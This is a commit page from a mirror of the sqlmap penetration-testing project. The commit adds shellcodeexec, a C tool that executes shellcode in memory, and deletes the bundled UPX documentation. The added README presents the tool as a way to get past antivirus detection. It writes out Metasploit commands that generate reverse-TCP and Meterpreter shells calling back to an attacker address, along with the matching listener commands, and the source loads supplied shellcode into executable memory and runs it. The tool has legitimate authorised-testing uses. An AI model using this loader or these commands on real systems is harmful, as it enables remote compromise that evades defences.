sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 01:26:42 +03:00
Code Issues Packages Projects Releases Wiki Activity

Major recode of --os-pwn functionality. Now the Metasploit shellcode can not be run as a Metasploit generated payload stager anymore. Instead it can be run on the target system either via sys_bineval() (as it was before, anti-forensics mode, all the same) or via shellcodeexec executable. Advantages are that:

Browse Source 
* It is stealthier as the shellcode itself does not touch the filesystem, it's an argument passed to shellcodeexec at runtime.
* shellcodeexec is not (yet) recognized as malicious by any (Avast excluded) AV product.
* shellcodeexec binary size is significantly smaller than a Metasploit payload stager (even when packed with UPX).
* UPX now is not needed anymore, so sqlmap package is also way smaller and less likely to be detected itself as malicious by your AV software.
shellcodeexec source code, compilation files and binaries are in extra/shellcodeexec/ folder now - copied over from https://github.com/inquisb/shellcodeexec.
Minor code refactoring.
This commit is contained in:
Bernardo Damele 2011-04-24 23:01:21 +00:00
parent d0a534dee5
commit e35f25b2cb
24 changed files with 507 additions and 1426 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

126
extra/shellcodeexec/README Normal file
View File

@ -0,0 +1,126 @@
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
= Background =
Most of the shellcode launchers out there, including proof of concepts
part of many "security" books, detail how to allocate a memory page as
readable/writable/executable on POSIX systems, copy over your shellcode
and execute it. This works just fine. However, it is limited to POSIX,
does not necessarily consider 64-bit architecture and Windows systems.
= Description =
This script and the relevant project files (Makefile and Visual Studio
files) allow you to compile the tool once then run your shellcode across
different architectures and operating systems.
Moreover, it solves a common real world issue: the target system's anti
virus software blocking a Metasploit-generated payload stager (either EXE
of ELF). Take for instance the following command line:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
This generates a Metasploit payload stager, payload.exe, that as soon as
it lands on the AV-protected target system is recognized as malicious and
potentially blocked (depending on the on-access scan settings) by many
anti virus products. At the time of writing this text, 21 out 41 anti
viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
multiple times with msfencode, less AV softwares detect it, still a lot.
I have been surfing the Net and found some interesting tutorials and
guides about packing, compressing, obfuscating and applying IDA-foo to
portable executables et similar in order to narrow down the number of AV
products that can detect it as a malicious file. This is all interesting,
but does not stop few hard-to-die anti viruses to detect your backdoor.
So the question is, how cool would it be to have a final solution to avoid
all this hassle? This is exactly where this tool comes into play!
= Features =
shellcodeexec:
* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
* Can be compiled and works on 32-bit and 64-bit architectures.
* As far as I know, no AV detect it as malicious.
* Works in DEP/NX-enabled environments: it allocates the memory page where
it stores the shellcode as +rwx - Readable Writable and eXecutable.
* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
shellcode (generated for instance with Metasploit's msfpayload) to
Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
BufferRegister variable to EAX registry where the address in memory of
the shellcode will be stored, to avoid get_pc() binary stub to be
prepended to the shellcode.
* Spawns a new thread where the shellcode is executed in a structure
exception handler (SEH) so that if you wrap shellcodeexec into your own
executable, it avoids the whole process to crash in case of unexpected
behaviours.
= HowTo =
1. Generate a Metasploit shellcode and encode it with the alphanumeric
encoder. For example for a Linux target:
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
Or for a Windows target:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
2. Execute the Metasploit multi/handler listener on your machine. For
example for a Linux target:
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Or for a Windows target:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3. Execute the alphanumeric-encoded shellcode with this tool. For example
on the Linux target:
$ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
Or, on the Windows target:
C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
= License =
This source code is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
= Author =
Bernardo Damele A. G. <bernardo.damele@gmail.com>
= Homepage =
https://github.com/inquisb/shellcodeexec

7
extra/shellcodeexec/linux/Makefile Normal file
View File

@ -0,0 +1,7 @@
32:
gcc -Wall -Os shellcodeexec.c -o shellcodeexec
strip -sx shellcodeexec
64:
gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
strip -sx shellcodeexec

138
extra/shellcodeexec/linux/shellcodeexec.c Normal file
View File

@ -0,0 +1,138 @@
/*
shellcodeexec - Script to execute in memory a sequence of opcodes
Copyright (C) 2011 Bernardo Damele A. G.
web: http://bernardodamele.blogspot.com
email: bernardo.damele@gmail.com
This source code is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
#include <ctype.h>
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
#include <windows.h>
DWORD WINAPI exec_payload(LPVOID lpParameter);
#else
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#endif
int sys_bineval(char *argv);
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
exit(-1);
}
sys_bineval(argv[1]);
exit(0);
}
int sys_bineval(char *argv)
{
size_t len;
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
int pID;
char *code;
#else
int *addr;
size_t page_size;
pid_t pID;
#endif
len = (size_t)strlen(argv);
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
// allocate a +rwx memory page
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// copy over the shellcode
strncpy(code, argv, len);
// execute it by ASM code defined in exec_payload function
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
#else
pID = fork();
if(pID<0)
return 1;
if(pID==0)
{
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
page_size = (len+page_size) & ~(page_size); // align to page boundary
// mmap an +rwx memory page
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
if (addr == MAP_FAILED)
return 1;
// copy over the shellcode
strncpy((char *)addr, argv, len);
// execute it
((void (*)(void))addr)();
}
if(pID>0)
waitpid(pID, 0, WNOHANG);
#endif
return 0;
}
#if defined(_WIN64)
void __exec_payload(LPVOID);
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__exec_payload(lpParameter);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__asm
{
mov eax, [lpParameter]
call eax
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#endif

BIN
extra/shellcodeexec/linux/shellcodeexec.x32 Executable file
View File

Binary file not shown.

BIN
extra/shellcodeexec/linux/shellcodeexec.x64 Executable file
View File

Binary file not shown.

25
extra/shellcodeexec/windows/README Normal file
View File

@ -0,0 +1,25 @@
Before compiling, an enviroment variable has to be set.
--------------------------------------------------------------------------
Variable name Variable description
--------------------------------------------------------------------------
PLATFORM_SDK_DIR Directory where the Platform SDK is installed
Procedure for setting environment variables on Windows:
My Computer -> Properties -> Advanced -> Environment Variables
User variables -> New
Sample value:
--------------------------------------------------------------------------
Variable name Variable value
--------------------------------------------------------------------------
PLATFORM_SDK_DIR C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
Notes:
To get as small portable executable as possible compile as follows:
* Use Visual C++ 2005
* Strip the executable with UPX

BIN
extra/shellcodeexec/windows/shellcodeexec.sln Normal file
View File

Binary file not shown.

BIN
extra/shellcodeexec/windows/shellcodeexec.x32.exe Executable file
View File

Binary file not shown.

138
extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c Normal file
View File

@ -0,0 +1,138 @@
/*
shellcodeexec - Script to execute in memory a sequence of opcodes
Copyright (C) 2011 Bernardo Damele A. G.
web: http://bernardodamele.blogspot.com
email: bernardo.damele@gmail.com
This source code is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
#include <ctype.h>
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
#include <windows.h>
DWORD WINAPI exec_payload(LPVOID lpParameter);
#else
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#endif
int sys_bineval(char *argv);
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
exit(-1);
}
sys_bineval(argv[1]);
exit(0);
}
int sys_bineval(char *argv)
{
size_t len;
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
int pID;
char *code;
#else
int *addr;
size_t page_size;
pid_t pID;
#endif
len = (size_t)strlen(argv);
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
// allocate a +rwx memory page
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// copy over the shellcode
strncpy(code, argv, len);
// execute it by ASM code defined in exec_payload function
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
#else
pID = fork();
if(pID<0)
return 1;
if(pID==0)
{
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
page_size = (len+page_size) & ~(page_size); // align to page boundary
// mmap an +rwx memory page
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
if (addr == MAP_FAILED)
return 1;
// copy over the shellcode
strncpy((char *)addr, argv, len);
// execute it
((void (*)(void))addr)();
}
if(pID>0)
waitpid(pID, 0, WNOHANG);
#endif
return 0;
}
#if defined(_WIN64)
void __exec_payload(LPVOID);
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__exec_payload(lpParameter);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__asm
{
mov eax, [lpParameter]
call eax
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#endif

BIN
extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj Normal file
View File

Binary file not shown.

138
lib/contrib/upx/doc/LICENSE
View File

@ -1,138 +0,0 @@
-----BEGIN PGP SIGNED MESSAGE-----
ooooo ooo ooooooooo. ooooooo ooooo
`888' `8' `888 `Y88. `8888 d8'
888 8 888 .d88' Y888..8P
888 8 888ooo88P' `8888'
888 8 888 .8PY888.
`88. .8' 888 d8' `888b
`YbodP' o888o o888o o88888o
The Ultimate Packer for eXecutables
Copyright (c) 1996-2000 Markus Oberhumer & Laszlo Molnar
http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
http://www.nexus.hu/upx
http://upx.tsx.org
PLEASE CAREFULLY READ THIS LICENSE AGREEMENT, ESPECIALLY IF YOU PLAN
TO MODIFY THE UPX SOURCE CODE OR USE A MODIFIED UPX VERSION.
ABSTRACT
========
UPX and UCL are copyrighted software distributed under the terms
of the GNU General Public License (hereinafter the "GPL").
The stub which is imbedded in each UPX compressed program is part
of UPX and UCL, and contains code that is under our copyright. The
terms of the GNU General Public License still apply as compressing
a program is a special form of linking with our stub.
As a special exception we grant the free usage of UPX for all
executables, including commercial programs.
See below for details and restrictions.
COPYRIGHT
=========
UPX and UCL are copyrighted software. All rights remain with the authors.
UPX is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
UPX is Copyright (C) 1996-2000 Laszlo Molnar
UCL is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
GNU GENERAL PUBLIC LICENSE
==========================
UPX and the UCL library are free software; you can redistribute them
and/or modify them under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of
the License, or (at your option) any later version.
UPX and UCL are distributed in the hope that they will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; see the file COPYING.
SPECIAL EXCEPTION FOR COMPRESSED EXECUTABLES
============================================
The stub which is imbedded in each UPX compressed program is part
of UPX and UCL, and contains code that is under our copyright. The
terms of the GNU General Public License still apply as compressing
a program is a special form of linking with our stub.
Hereby Markus F.X.J. Oberhumer and Laszlo Molnar grant you special
permission to freely use and distribute all UPX compressed programs
(including commercial ones), subject to the following restrictions:
1. You must compress your program with a completely unmodified UPX
version; either with our precompiled version, or (at your option)
with a self compiled version of the unmodified UPX sources as
distributed by us.
2. This also implies that the UPX stub must be completely unmodfied, i.e.
the stub imbedded in your compressed program must be byte-identical
to the stub that is produced by the official unmodified UPX version.
3. The decompressor and any other code from the stub must exclusively get
used by the unmodified UPX stub for decompressing your program at
program startup. No portion of the stub may get read, copied,
called or otherwise get used or accessed by your program.
ANNOTATIONS
===========
- You can use a modified UPX version or modified UPX stub only for
programs that are compatible with the GNU General Public License.
- We grant you special permission to freely use and distribute all UPX
compressed programs. But any modification of the UPX stub (such as,
but not limited to, removing our copyright string or making your
program non-decompressible) will immediately revoke your right to
use and distribute a UPX compressed program.
- UPX is not a software protection tool; by requiring that you use
the unmodified UPX version for your proprietary programs we
make sure that any user can decompress your program. This protects
both you and your users as nobody can hide malicious code -
any program that cannot be decompressed is highly suspicious
by definition.
- You can integrate all or part of UPX and UCL into projects that
are compatible with the GNU GPL, but obviously you cannot grant
any special exceptions beyond the GPL for our code in your project.
- We want to actively support manufacturers of virus scanners and
similar security software. Please contact us if you would like to
incorporate parts of UPX or UCL into such a product.
Markus F.X.J. Oberhumer Laszlo Molnar
markus.oberhumer@jk.uni-linz.ac.at ml1050@cdata.tvnet.hu
Linz, Austria, 25 Feb 2000
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQCVAwUBOLaLS210fyLu8beJAQFYVAP/ShzENWKLTvedLCjZbDcwaBEHfUVcrGMI
wE7frMkbWT2zmkdv9hW90WmjMhOBu7yhUplvN8BKOtLiolEnZmLCYu8AGCwr5wBf
dfLoClxnzfTtgQv5axF1awp4RwCUH3hf4cDrOVqmAsWXKPHtm4hx96jF6L4oHhjx
OO03+ojZdO8=
=CS52
-----END PGP SIGNATURE-----

142
lib/contrib/upx/doc/README
View File

@ -1,142 +0,0 @@
ooooo ooo ooooooooo. ooooooo ooooo
`888' `8' `888 `Y88. `8888 d8'
888 8 888 .d88' Y888..8P
888 8 888ooo88P' `8888'
888 8 888 .8PY888.
`88. .8' 888 d8' `888b
`YbodP' o888o o888o o88888o
The Ultimate Packer for eXecutables
Copyright (c) 1996-2008 Markus Oberhumer, Laszlo Molnar & John Reiser
http://upx.sourceforge.net
WELCOME
=======
Welcome to UPX !
Please don't forget to read the file LICENSE - UPX is distributed
under the GNU General Public License (GPL) with special exceptions
allowing the distribution of all compressed executables, including
commercial programs.
INTRODUCTION
============
UPX is an advanced executable file compressor. UPX will typically
reduce the file size of programs and DLLs by around 50%-70%, thus
reducing disk space, network load times, download times and
other distribution and storage costs.
Programs and libraries compressed by UPX are completely self-contained
and run exactly as before, with no runtime or memory penalty for most
of the supported formats.
UPX supports a number of different executable formats, including
Windows 95/98/ME/NT/2000/XP/CE programs and DLLs, DOS programs,
and Linux executables and kernels.
UPX is free software distributed under the term of the GNU General
Public License. Full source code is available.
UPX may be distributed and used freely, even with commercial applications.
See the UPX License Agreement for details.
UPX is rated number one in the well known Archive Comparison Test. Visit
http://compression.ca/ .
UPX aims to be Commercial Quality Freeware.
SHORT DOCUMENTATION
===================
'upx program.exe' will compress a program or DLL. For best compression
results try 'upx --brute program.exe'.
Please see the file UPX.DOC for the full documentation. The files
NEWS and BUGS also contain various tidbits of information.
DISCLAIMER
==========
UPX comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.
Having said that, we think that UPX is quite stable now. Indeed we
have compressed lots of files without any problems. Also, the
current version has undergone several months of beta testing -
actually it's almost 8 years since our first public beta.
This is the first production quality release, and we plan that future
releases will be backward compatible with this version.
Please report all problems or suggestions to the authors. Thanks.
THE FUTURE
==========
- We'd really love to support handheld systems like the PalmPilot because
compression makes a lot of sense here. And - because of the atari/tos
format - we already have a working decompressor in 68000 assembly.
Unfortunately we know next to nothing about the operating system
architecture of such handhelds, so we need some information from
an expert. Please contact us if you think you can help.
- The Linux approach could probably get ported to a lot of other Unix
variants, at least for other i386 architectures it shouldn't be too
much work. If someone sends me a fresh hard disk and an official
FreeBSD/OpenBSD/NetBSD/Solaris/BeOS... CD I might take a look at it ;-)
- We will *NOT* add any sort of protection and/or encryption.
This only gives people a false feeling of security because
by definition all protectors/compressors can be broken.
And don't trust any advertisement of authors of other executable
compressors about this topic - just do a websearch on "unpackers"...
- Fix all remaining bugs - keep your reports coming ;-)
- See the file PROJECTS in the source code distribution if you want
to contribute.
COPYRIGHT
=========
Copyright (C) 1996-2008 Markus Franz Xaver Johannes Oberhumer
Copyright (C) 1996-2008 Laszlo Molnar
Copyright (C) 2000-2008 John F. Reiser
This program may be used freely, and you are welcome to
redistribute it under certain conditions.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
UPX License Agreement for more details.
You should have received a copy of the UPX License Agreement along
with this program; see the file LICENSE. If not, visit the UPX home page.
Share and enjoy,
Markus & Laszlo
Markus F.X.J. Oberhumer Laszlo Molnar
<markus@oberhumer.com> <ml1050@users.sourceforge.net>
[ The term UPX is a shorthand for the Ultimate Packer for eXecutables
and holds no connection with potential owners of registered trademarks
or other rights. ]
[ Feel free to contact us if you have commercial compression requirements
or interesting job offers. ]

888
lib/contrib/upx/doc/upx.html
View File

@ -1,888 +0,0 @@
<?xml version="1.0" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>upx - compress or expand executable files</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rev="made" href="mailto:root@localhost" />
</head>
<body style="background-color: white">
<p><a name="__index__"></a></p>
<!-- INDEX BEGIN -->
<!--
<ul>
<li><a href="#name">NAME</a></li>
<li><a href="#synopsis">SYNOPSIS</a></li>
<li><a href="#abstract">ABSTRACT</a></li>
<li><a href="#disclaimer">DISCLAIMER</a></li>
<li><a href="#description">DESCRIPTION</a></li>
<li><a href="#commands">COMMANDS</a></li>
<ul>
<li><a href="#compress">Compress</a></li>
<li><a href="#decompress">Decompress</a></li>
<li><a href="#test">Test</a></li>
<li><a href="#list">List</a></li>
</ul>
<li><a href="#options">OPTIONS</a></li>
<li><a href="#compression_levels___tuning">COMPRESSION LEVELS &amp; TUNING</a></li>
<li><a href="#overlay_handling_options">OVERLAY HANDLING OPTIONS</a></li>
<li><a href="#environment">ENVIRONMENT</a></li>
<li><a href="#notes_for_the_supported_executable_formats">NOTES FOR THE SUPPORTED EXECUTABLE FORMATS</a></li>
<ul>
<li><a href="#notes_for_atari_tos">NOTES FOR ATARI/TOS</a></li>
<li><a href="#notes_for_bvmlinuz_i386">NOTES FOR BVMLINUZ/I386</a></li>
<li><a href="#notes_for_dos_com">NOTES FOR DOS/COM</a></li>
<li><a href="#notes_for_dos_exe">NOTES FOR DOS/EXE</a></li>
<li><a href="#notes_for_dos_sys">NOTES FOR DOS/SYS</a></li>
<li><a href="#notes_for_djgpp2_coff">NOTES FOR DJGPP2/COFF</a></li>
<li><a href="#notes_for_linux__general_">NOTES FOR LINUX [general]</a></li>
<li><a href="#notes_for_linux_elf386">NOTES FOR LINUX/ELF386</a></li>
<li><a href="#notes_for_linux_sh386">NOTES FOR LINUX/SH386</a></li>
<li><a href="#notes_for_linux_386">NOTES FOR LINUX/386</a></li>
<li><a href="#notes_for_ps1_exe">NOTES FOR PS1/EXE</a></li>
<li><a href="#notes_for_rtm32_pe_and_arm_pe">NOTES FOR RTM32/PE and ARM/PE</a></li>
<li><a href="#notes_for_tmt_adam">NOTES FOR TMT/ADAM</a></li>
<li><a href="#notes_for_vmlinuz_386">NOTES FOR VMLINUZ/386</a></li>
<li><a href="#notes_for_watcom_le">NOTES FOR WATCOM/LE</a></li>
<li><a href="#notes_for_win32_pe">NOTES FOR WIN32/PE</a></li>
</ul>
<li><a href="#diagnostics">DIAGNOSTICS</a></li>
<li><a href="#bugs">BUGS</a></li>
<li><a href="#authors">AUTHORS</a></li>
<li><a href="#copyright">COPYRIGHT</a></li>
</ul>
-->
<!-- INDEX END -->
<p>
</p>
<h1><a name="name">NAME</a></h1>
<p>upx - compress or expand executable files</p>
<p>
</p>
<hr />
<h1><a name="synopsis">SYNOPSIS</a></h1>
<p><strong>upx</strong> [&nbsp;<em>command</em>&nbsp;] [&nbsp;<em>options</em>&nbsp;] <em>filename</em>...</p>
<p>
</p>
<hr />
<h1><a name="abstract">ABSTRACT</a></h1>
<pre>
The Ultimate Packer for eXecutables
Copyright (c) 1996-2008 Markus Oberhumer, Laszlo Molnar &amp; John Reiser
<a href="http://upx.sourceforge.net">http://upx.sourceforge.net</a></pre>
<p><strong>UPX</strong> is a portable, extendable, high-performance executable packer for
several different executable formats. It achieves an excellent compression
ratio and offers <em>*very*</em> fast decompression. Your executables suffer
no memory overhead or other drawbacks for most of the formats supported,
because of in-place decompression.</p>
<p>While you may use <strong>UPX</strong> freely for both non-commercial and commercial
executables (for details see the file LICENSE), we would highly
appreciate if you credit <strong>UPX</strong> and ourselves in the documentation,
possibly including a reference to the <strong>UPX</strong> home page. Thanks.</p>
<p>[ Using <strong>UPX</strong> in non-OpenSource applications without proper credits
is considered not politically correct ;-) ]</p>
<p>
</p>
<hr />
<h1><a name="disclaimer">DISCLAIMER</a></h1>
<p><strong>UPX</strong> comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.</p>
<p>This is the first production quality release, and we plan that future 1.xx
releases will be backward compatible with this version.</p>
<p>Please report all problems or suggestions to the authors. Thanks.</p>
<p>
</p>
<hr />
<h1><a name="description">DESCRIPTION</a></h1>
<p><strong>UPX</strong> is a versatile executable packer with the following features:</p>
<pre>
- excellent compression ratio: compresses better than zip/gzip,
use UPX to decrease the size of your distribution !</pre>
<pre>
- very fast decompression: about 10 MiB/sec on an ancient Pentium 133,
about 200 MiB/sec on an Athlon XP 2000+.</pre>
<pre>
- no memory overhead for your compressed executables for most of the
supported formats</pre>
<pre>
- safe: you can list, test and unpack your executables
Also, a checksum of both the compressed and uncompressed file is
maintained internally.</pre>
<pre>
- universal: UPX can pack a number of executable formats:
* atari/tos
* bvmlinuz/386 [bootable Linux kernel]
* djgpp2/coff
* dos/com
* dos/exe
* dos/sys
* linux/386
* linux/elf386
* linux/sh386
* ps1/exe
* rtm32/pe
* tmt/adam
* vmlinuz/386 [bootable Linux kernel]
* vmlinux/386
* watcom/le (supporting DOS4G, PMODE/W, DOS32a and CauseWay)
* win32/pe (exe and dll)
* arm/pe (exe and dll)
* linux/elfamd64
* linux/elfppc32
* mach/elfppc32</pre>
<pre>
- portable: UPX is written in portable endian-neutral C++</pre>
<pre>
- extendable: because of the class layout it's very easy to support
new executable formats or add new compression algorithms</pre>
<pre>
- free: UPX can be distributed and used freely. And from version 0.99
the full source code of UPX is released under the GNU General Public
License (GPL) !</pre>
<p>You probably understand now why we call <strong>UPX</strong> the ``<em>ultimate</em>''
executable packer.</p>
<p>
</p>
<hr />
<h1><a name="commands">COMMANDS</a></h1>
<p>
</p>
<h2><a name="compress">Compress</a></h2>
<p>This is the default operation, eg. <strong>upx yourfile.exe</strong> will compress the file
specified on the command line.</p>
<p>
</p>
<h2><a name="decompress">Decompress</a></h2>
<p>All <strong>UPX</strong> supported file formats can be unpacked using the <strong>-d</strong> switch, eg.
<strong>upx -d yourfile.exe</strong> will uncompress the file you've just compressed.</p>
<p>
</p>
<h2><a name="test">Test</a></h2>
<p>The <strong>-t</strong> command tests the integrity of the compressed and uncompressed
data, eg. <strong>upx -t yourfile.exe</strong> check whether your file can be safely
decompressed. Note, that this command doesn't check the whole file, only
the part that will be uncompressed during program execution. This means
that you should not use this command instead of a virus checker.</p>
<p>
</p>
<h2><a name="list">List</a></h2>
<p>The <strong>-l</strong> command prints out some information about the compressed files
specified on the command line as parameters, eg <strong>upx -l yourfile.exe</strong>
shows the compressed / uncompressed size and the compression ratio of
<em>yourfile.exe</em>.</p>
<p>
</p>
<hr />
<h1><a name="options">OPTIONS</a></h1>
<p><strong>-q</strong>: be quiet, suppress warnings</p>
<p><strong>-q -q</strong> (or <strong>-qq</strong>): be very quiet, suppress errors</p>
<p><strong>-q -q -q</strong> (or <strong>-qqq</strong>): produce no output at all</p>
<p><strong>--help</strong>: prints the help</p>
<p><strong>--version</strong>: print the version of <strong>UPX</strong></p>
<p><strong>--exact</strong>: when compressing, require to be able to get a byte-identical file
after decompression with option <strong>-d</strong>. [NOTE: this is work in progress and is
not supported for all formats yet. If you do care, as a workaround you can
compress and then decompress your program a first time - any further
compress-decompress steps should then yield byte-identical results
as compared to the first decompressed version.]</p>
<p>[ ...to be written... - type `<strong>upx --help</strong>' for now ]</p>
<p>
</p>
<hr />
<h1><a name="compression_levels___tuning">COMPRESSION LEVELS &amp; TUNING</a></h1>
<p><strong>UPX</strong> offers ten different compression levels from <strong>-1</strong> to <strong>-9</strong>,
and <strong>--best</strong>. The default compression level is <strong>-8</strong> for files
smaller than 512 KiB, and <strong>-7</strong> otherwise.</p>
<ul>
<li>
<p>Compression levels 1, 2 and 3 are pretty fast.</p>
</li>
<li>
<p>Compression levels 4, 5 and 6 achieve a good time/ratio performance.</p>
</li>
<li>
<p>Compression levels 7, 8 and 9 favor compression ratio over speed.</p>
</li>
<li>
<p>Compression level <strong>--best</strong> may take a long time.</p>
</li>
</ul>
<p>Note that compression level <strong>--best</strong> can be somewhat slow for large
files, but you definitely should use it when releasing a final version
of your program.</p>
<p>Quick info for achieving the best compression ratio:</p>
<ul>
<li>
<p>Try <strong>upx --brute myfile.exe</strong> or even <strong>upx --ultra-brute myfile.exe</strong>.</p>
</li>
<li>
<p>Try if <strong>--overlay=strip</strong> works.</p>
</li>
<li>
<p>For win32/pe programs there's <strong>--strip-relocs=0</strong>. See notes below.</p>
</li>
</ul>
<p>
</p>
<hr />
<h1><a name="overlay_handling_options">OVERLAY HANDLING OPTIONS</a></h1>
<p>Info: An ``overlay'' means auxiliary data attached after the logical end of
an executable, and it often contains application specific data
(this is a common practice to avoid an extra data file, though
it would be better to use resource sections).</p>
<p><strong>UPX</strong> handles overlays like many other executable packers do: it simply
copies the overlay after the compressed image. This works with some
files, but doesn't work with others, depending on how an application
actually accesses this overlayed data.</p>
<pre>
--overlay=copy Copy any extra data attached to the file. [DEFAULT]</pre>
<pre>
--overlay=strip Strip any overlay from the program instead of
copying it. Be warned, this may make the compressed
program crash or otherwise unusable.</pre>
<pre>
--overlay=skip Refuse to compress any program which has an overlay.</pre>
<p>
</p>
<hr />
<h1><a name="environment">ENVIRONMENT</a></h1>
<p>The environment variable <strong>UPX</strong> can hold a set of default
options for <strong>UPX</strong>. These options are interpreted first and
can be overwritten by explicit command line parameters.
For example:</p>
<pre>
for DOS/Windows: set UPX=-9 --compress-icons#0
for sh/ksh/zsh: UPX=&quot;-9 --compress-icons=0&quot;; export UPX
for csh/tcsh: setenv UPX &quot;-9 --compress-icons=0&quot;</pre>
<p>Under DOS/Windows you must use '#' instead of '=' when setting the
environment variable because of a COMMAND.COM limitation.</p>
<p>Not all of the options are valid in the environment variable -
<strong>UPX</strong> will tell you.</p>
